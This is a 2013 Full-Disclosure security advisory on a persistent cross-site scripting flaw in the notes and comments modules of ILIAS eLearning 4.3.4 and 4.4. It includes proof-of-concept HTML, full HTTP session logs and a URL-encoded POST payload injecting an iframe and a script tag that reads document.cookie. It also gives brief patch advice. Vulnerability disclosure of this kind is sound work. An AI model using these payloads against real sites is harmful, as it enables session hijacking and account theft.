[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Mon, 28 Oct 2013 14:10:01 +0100
Document Title:
===============
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1122
Release Date:
=============
2013-10-27
Vulnerability Laboratory ID (VL-ID):
====================================
1122
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
ILIAS is a web base learning management system (LMS, VLE). Features: Courses,
SCORM 1.2 and 2004, mail, forum, chat, groups,
podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP,
role based access.
(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities
in the ILIAS eLearning v4.3.4 & v4.4 CMS web-application.
Vulnerability Disclosure Timeline:
==================================
2013-10-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability is detected in the ILIAS
eLearning v4.3.4 & v4.4 CMS web-application.
The bug allows an attacker (remote) to implement/inject malicious own malicious
persistent script codes (application side).
The persistent web vulnerability is located in the `Notes & Comments` module.
Remote attackers are able to inject own
malicious script code via POST method request in the vulnerable comment or note
parameters. The execute occurs in the
in the comments and private notes modules of the admin panel.
Exploitation of the persistent web vulnerability requires low user interaction
and a low privileged web-application user account.
Successful exploitation of the vulnerability can lead to persistent session
hijacking (customers), account steal via persistent
web attacks, persistent phishing or persistent module context manipulation.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Notes
[+] Comments
Vulnerable Parameter(s):
[+] note
Affected Module(s):
[+] Private Notes
[+] Comments Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote
attackers with low user interaction and low privileged
web-application user account. For demonstration or to reproduce ...
PoC: Public Comments & private Notes
<div class="ilNote">
<a name="note_35"><!-- <img src="./templates/default/images/note_unlabeled.png"
alt="Note"
title="Note" border="0" style="vertical-align:text-bottom;
margin-bottom:2px;"/> --></a>
<span class="small light"> Last edited on 26. Oct 2013</span>
<div class="ilNoteText"><h4 class="ilNoteTitle"></h4>><%20%20"<[PERSISTENT
INJECTED SCRIPT CODE!]">
</div></div>
--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?
note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101
Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie;
authchallenge=459071aa3327de70506cb2a465507bf5]
Connection[keep-alive]
Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E
%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[text/html]
Status: 200[OK]
GET
http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ]
Content Size[4997]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101
Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie;
authchallenge=459071aa3327de70506cb2a465507bf5]
Connection[keep-alive]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
P3P[CP="CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT
STA PRE"]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[4997]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=UTF-8]
Reference(s):
ilias.localhost:8080/ilias.php?baseClass=ilPersonalDesktopGUI&cmd=jumpToSelectedItems
ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top
ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=x
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the note input
field.
Recognize also the affected output section were the vulnerable value executes.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is
estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/